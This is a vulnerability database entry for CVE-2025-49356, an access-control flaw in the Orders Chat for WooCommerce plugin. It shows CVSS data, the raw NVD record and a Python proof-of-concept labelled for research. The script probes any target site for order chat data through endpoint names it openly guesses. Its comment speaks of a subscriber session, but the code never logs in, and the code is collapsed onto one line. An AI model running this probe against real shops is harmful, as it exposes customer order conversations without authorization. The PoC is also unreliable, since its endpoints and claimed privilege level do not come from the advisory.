Security Vulnerability Report
中文
CVE-2025-49356 CVSS 4.3 MEDIUM

CVE-2025-49356

Published: 2025-12-31 16:15:43
Last Modified: 2026-04-23 15:31:32

Description

Missing Authorization vulnerability in Mykola Lukin Orders Chat for WooCommerce orders-chat-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Orders Chat for WooCommerce: from n/a through <= 1.2.0.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

orders-chat-for-woocommerce <= 1.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-49356 PoC - Missing Authorization in Orders Chat for WooCommerce # Target: WordPress site with orders-chat-for-woocommerce plugin <= 1.2.0 def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-49356 This PoC attempts to access order chat data without proper authorization """ # Setup session with low-privilege user (subscriber role) session = requests.Session() # Try to access order chat data via AJAX endpoint # Common AJAX action names for order chat plugins ajax_actions = [ 'ocfw_get_order_chats', 'ocfw_get_chat_messages', 'ocfw_get_all_orders_chats', 'get_order_chat_data' ] # Try REST API endpoints rest_endpoints = [ '/wp-json/ocfw/v1/orders', '/wp-json/ocfw/v1/chats', '/wp-json/ocfw/v1/order-chats' ] vulnerable = False # Test AJAX endpoints for action in ajax_actions: data = { 'action': action, 'order_id': 1 # Try to access order ID 1 } try: response = session.post( f'{target_url}/wp-admin/admin-ajax.php', data=data, timeout=10 ) # Check if response contains sensitive order chat data if response.status_code == 200 and ('chat' in response.text.lower() or 'order' in response.text.lower()): if 'unauthorized' not in response.text.lower() and 'permission' not in response.text.lower(): print(f'[+] Potential vulnerability found via AJAX action: {action}') vulnerable = True except requests.RequestException: pass # Test REST API endpoints for endpoint in rest_endpoints: try: response = session.get(f'{target_url}{endpoint}', timeout=10) if response.status_code == 200: try: json_data = response.json() if json_data and len(str(json_data)) > 50: print(f'[+] Potential vulnerability found via REST endpoint: {endpoint}') vulnerable = True except: pass except requests.RequestException: pass return vulnerable if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-49356_poc.py <target_url>') print('Example: python cve-2025-49356_poc.py http://example.com') sys.exit(1) target = sys.argv[1].rstrip('/') print(f'[*] Testing {target} for CVE-2025-49356...') if check_vulnerability(target): print('[+] Target appears to be vulnerable to CVE-2025-49356') print('[+] Recommendation: Update orders-chat-for-woocommerce to version > 1.2.0') else: print('[-] Target does not appear to be vulnerable or plugin not installed')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49356", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:43.240", "lastModified": "2026-04-23T15:31:31.523", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Mykola Lukin Orders Chat for WooCommerce orders-chat-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Orders Chat for WooCommerce: from n/a through <= 1.2.0."}, {"lang": "es", "value": "Vulnerabilidad por ausencia de autorización en Mykola Lukin Orders Chat para WooCommerce permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Orders Chat para WooCommerce: desde n/a hasta 1.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/orders-chat-for-woocommerce/vulnerability/wordpress-orders-chat-for-woocommerce-plugin-1-2-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}